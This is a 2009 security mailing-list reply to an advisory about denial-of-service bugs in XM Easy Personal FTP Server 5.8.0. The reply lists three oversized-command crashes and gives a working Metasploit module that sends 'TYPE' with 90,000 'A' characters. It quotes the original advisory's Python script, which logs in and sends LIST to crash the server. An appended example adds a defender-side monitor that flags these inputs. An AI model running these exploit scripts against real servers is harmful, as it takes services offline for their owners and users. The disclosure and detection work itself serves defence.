Re: XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability

From: Protek Research Lab (protekresearchlabyahoo.ca)
Date: Tue Nov 10 2009 - 15:37:54 CST


Hi,

It seems to have many more bugs than what you listed in your advisory. It's possible to DoS the server with these 3 other commands:

HELP ('A' * 90000)
NLST ('A' * 90000)
TYPE ('A' * 90000)

Here is an auxiliary module for metasploit...

    require 'msf/core'

    class Metasploit3 < Msf::Auxiliary

      include Msf::Exploit::Remote::Ftp
      include Msf::Auxiliary::Dos

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'XM Easy Personal FTP Server 5.8.0 Type DoS',
          'Description'    => %q{
            You need a valid login to DoS this FTP server, but even anonymous can do it as long as it has permission to call Type.
          },
          'Author'         => 'Francis Provencher, Protek Research Lab',
          'License'        => MSF_LICENSE,
          'Version'        => '$Revision: 1 $',
          'References'     => [ [ 'URL', 'http://protekresearch.blogspot.com' ] ],
          'DisclosureDate' => '2009/11/10')
        )

        # They're required
        register_options([
          OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
          OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])
        ])
      end

      def run
        return unless connect_login
        raw_send_recv("TYPE #{'A' * 90000}\r\n")
        disconnect
        print_status("OK, server may still be technically listening, but it won't respond")
      end
    end

Have a nice day!

--- On Tue, 11/10/09, zhangmcmail.ustc.edu.cn <zhangmcmail.ustc.edu.cn> wrote:

> From: zhangmcmail.ustc.edu.cn <zhangmcmail.ustc.edu.cn>
> Subject: XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability
> To: bugtraqsecurityfocus.com
> Received: Tuesday, November 10, 2009, 3:07 AM
>
> Date of Discovery: 10-Nov-2009
>
> Credits: zhangmc[at]mail.ustc.edu.cn
>
> Vendor: Dxmsoft
>
> Affected:
> XM Easy Personal FTP Server 5.8.0
> Earlier versions may also be affected
>
> Overview:
> XM Easy Personal FTP Server is an easy-to-use FTP server
> application. A denial of service vulnerability exists in XM
> Personal FTP Server that causes the application to crash
> when the "LIST" is sent to FTP server if you do not use
> "PASV" or "POST" first.
>
> Details:
> XM Easy Personal FTP Server can't handle "LIST" command if
> you do not use "PASV" or "POST" first. If you have logged on
> the server successfully, a "LIST" command will lead the ftp
> server to crash.
>
> Severity:
> High
>
> Exploit example:
> #!/usr/bin/python
> import socket
> import sys
>
> def Usage():
>     print ("Usage:  ./expl.py <serv_ip>      <Username> <password>\n")
>     print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
> if len(sys.argv) <> 4:
>         Usage()
>         sys.exit(1)
> else:
>     hostname=sys.argv[1]
>     username=sys.argv[2]
>     passwd=sys.argv[3]
>     sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
>     try:
>         sock.connect((hostname, 21))
>     except:
>         print ("Connection error!")
>         sys.exit(1)
>     r=sock.recv(1024)
>     sock.send("user %s\r\n" %username)
>     r=sock.recv(1024)
>     sock.send("pass %s\r\n" %passwd)
>     r=sock.recv(1024)
>     sock.send("LIST\r\n")
>     sock.close()
>     sys.exit(0);
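
Added example, not part of the original post or the quoted advisory: a defender-side monitor for one FTP control connection that flags the two conditions reported in this thread, an over-long command line and LIST sent with no data connection set up. The 512-byte limit, the class and function names, and the choice of PASV/PORT/EPSV/EPRT as the data-connection commands (the advisory writes "POST") are assumptions, and the session lines are constructed.

```python
from dataclasses import dataclass, field
from typing import List, Optional

# Assumptions for this example (not values from the advisory or the vendor):
MAX_LINE = 512                                # cap on one control-channel line
DATA_SETUP = {"PASV", "PORT", "EPSV", "EPRT"} # commands that set up a data connection
DATA_USERS = {"LIST"}                         # command the advisory reports as crashing


@dataclass
class FtpSessionMonitor:
    """Tracks one control connection and records suspicious command lines."""
    data_channel_ready: bool = False
    findings: List[str] = field(default_factory=list)

    def feed(self, raw: bytes) -> Optional[str]:
        """Inspect one client command line; return a finding tag or None."""
        verb = raw.rstrip(b"\r\n").partition(b" ")[0][:8]
        verb_s = verb.decode("ascii", "replace").upper()
        finding = None
        if len(raw) > MAX_LINE:
            # Covers the HELP/NLST/TYPE + 'A' * 90000 lines from the reply.
            finding = f"oversized:{verb_s}:{len(raw)}"
        elif verb_s in DATA_SETUP:
            self.data_channel_ready = True
        elif verb_s in DATA_USERS:
            if not self.data_channel_ready:
                finding = f"no-data-channel:{verb_s}"
            # Assumed model: each setup command covers a single transfer.
            self.data_channel_ready = False
        if finding:
            self.findings.append(finding)
        return finding


# Constructed control-channel capture, one client line per entry.
SAMPLE_SESSION = [
    b"USER anonymous\r\n",
    b"PASS anonymous\r\n",
    b"LIST\r\n",                          # LIST before any PASV/PORT
    b"PASV\r\n",
    b"LIST\r\n",                          # normal listing
    b"TYPE " + b"A" * 90000 + b"\r\n",    # over-long argument
    b"TYPE I\r\n",
]


def scan(lines: List[bytes]) -> List[Optional[str]]:
    """Run a fresh monitor over a whole session and return per-line results."""
    monitor = FtpSessionMonitor()
    return [monitor.feed(line) for line in lines]
```

The same checks can run in a proxy in front of the server, dropping a flagged line instead of forwarding it.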